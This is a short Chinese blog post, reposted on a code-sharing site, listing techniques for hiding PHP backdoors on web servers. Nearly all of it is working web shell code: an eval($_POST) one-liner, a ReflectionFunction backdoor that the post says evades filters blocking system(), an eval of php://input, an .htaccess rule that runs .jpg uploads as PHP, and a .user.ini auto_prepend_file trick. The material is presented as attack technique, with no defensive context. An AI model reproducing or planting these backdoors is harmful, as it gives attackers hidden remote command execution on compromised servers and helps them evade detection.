码迷,mamicode.com
首页 > Web开发 > 详细

php后门隐藏技巧

时间:2015-08-25 14:26:40      阅读:241      评论:0      收藏:0      [点我收藏+]

标签:技巧

一句话 and 大马

 phpspy  菜刀一句话<?php@eval($_POST[‘cmd‘]);?>


反射后门

<?php

   $func = new ReflectionFunction($_GET[m]);

   echo $func->invokeArgs(array($_GET[c]));

?>

调用如x.php?m=system&c=whoami
后门也可绕过某些检测禁用system函数的防护系统

技术分享

php:input

php://input是用来接收post数据(这里有php://input的介绍)

<?php

@eval(file_get_contents(‘php://input‘))

?>

 

Post提交 system(‘whoami‘);

技术分享

.htaccess(webserver支持)

可以设置任意后缀也可以设置UTF7编码格式shell

AddType  application/x-httpd-php     .jpg

然后再传一个JPG结尾的shell,访问即可执行了

.user.ini(fastcgi配合)

 动态修改php.ini配置文件

User.ini

auto_prepend_file=demo.gif(准备用php://input呢 测试不成功 不知道为何)


技术分享

技术分享



本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1687963

php后门隐藏技巧

标签:技巧

原文地址:http://0x007.blog.51cto.com/6330498/1687963

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!